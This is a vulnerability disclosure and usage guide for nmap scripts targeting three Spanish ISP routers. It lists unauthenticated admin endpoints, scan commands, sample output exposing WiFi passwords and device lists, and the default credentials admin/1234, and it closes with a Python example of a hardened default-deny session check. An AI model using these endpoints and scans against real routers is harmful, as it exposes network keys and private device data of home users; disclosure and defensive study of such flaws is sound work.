`Huawei HG253s v2
Vodafone-Spain is starting to rent a new Huawei HG253v2 router to its
Spanish customers. This new router comes with a new firmware version.
This bug has been found by @VicenDominguez
Vulnerability
The router does not validate the session cookie on some administration
web pages, so the information behind the following URLs can be read
directly on any router whose web interface is open to the Internet.
http://IP/html_253s/api/ntwk/WlanBasic
http://IP/html_253s/api/system/diagnose_internet
http://IP/html_253s/api/system/hostinfo?type=ethhost
http://IP/html_253s/api/system/hostinfo?type=guesthost
http://IP/html_253s/api/system/hostinfo?type=homehost
http://IP/html_253s/api/system/hostinfo?type=wifihost
http://IP/html_253s/api/system/wizardcfg
Usage
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
Comtrend VG 8050
Telefonica-Spain is starting to rent a new Comtrend VG 8050 router to its
Spanish customers. This new router comes with a new firmware version.
This bug has been found by @DaniLabs
Vulnerability
The router does not validate the session cookie on some administration
web pages, so the information behind the following URLs can be read
directly on any router whose web interface is open to the Internet.
http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx
Usage
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
ADB P.DGA4001N (HomeStation)
Telefonica-Spain is starting to rent a new ADB P.DGA4001N router to its
Spanish customers. This new router comes with a new firmware version.
This bug has been found by @DaniLabs
Vulnerability
The router does not validate the session cookie on some administration
web pages, so the information behind the following URLs can be read
directly on any router whose web interface is open to the Internet.
http://IP/getWifiInfo.jx
http://IP/listDevices.jx
http://IP/infoApplications.jx
In addition, the default credentials are admin / 1234
Usage
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X
The scripts are available at https://github.com/DaniLabs/scripts-nse
`
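The flaw class described above (a session check applied only to some administration pages), shown beside a default-deny dispatcher; this is an added example, not code from the advisory or from any vendor firmware. The cookie name `SessionID`, the `/login` and `/hypothetical/settings` paths and the handler bodies are assumptions made for the illustration; the `/html_253s/api/...` paths are the ones listed in the advisory.

```python
import secrets

# Constructed route table. The /html_253s paths are from the advisory; the
# cookie name, /login, /hypothetical/settings and handler bodies are assumed.
ROUTES = {
    "/html_253s/api/ntwk/WlanBasic": lambda: {"ssid": "example", "key": "redacted"},
    "/html_253s/api/system/wizardcfg": lambda: {"wizard": "cfg"},
    "/hypothetical/settings": lambda: {"settings": "..."},
    "/login": lambda: {"form": "login"},
}
PUBLIC_PATHS = frozenset({"/login"})  # everything else requires a session
SESSIONS = set()                      # server-side store of live session ids


def new_session():
    """Issue an unguessable session id after a successful login."""
    sid = secrets.token_hex(16)
    SESSIONS.add(sid)
    return sid


def session_valid(cookies):
    """A cookie is valid only if it matches a session the server issued."""
    return cookies.get("SessionID") in SESSIONS


def dispatch_vulnerable(path, cookies):
    """Flawed pattern: the check is opt-in per page, so every endpoint
    missing from the 'protected' list answers without a session."""
    protected = {"/hypothetical/settings"}
    if path in protected and not session_valid(cookies):
        return 401, None
    handler = ROUTES.get(path)
    return (200, handler()) if handler else (404, None)


def dispatch_hardened(path, cookies):
    """Default deny: the session check runs before routing for every path
    that is not explicitly public, including unknown paths."""
    if path not in PUBLIC_PATHS and not session_valid(cookies):
        return 401, None
    handler = ROUTES.get(path)
    return (200, handler()) if handler else (404, None)
```
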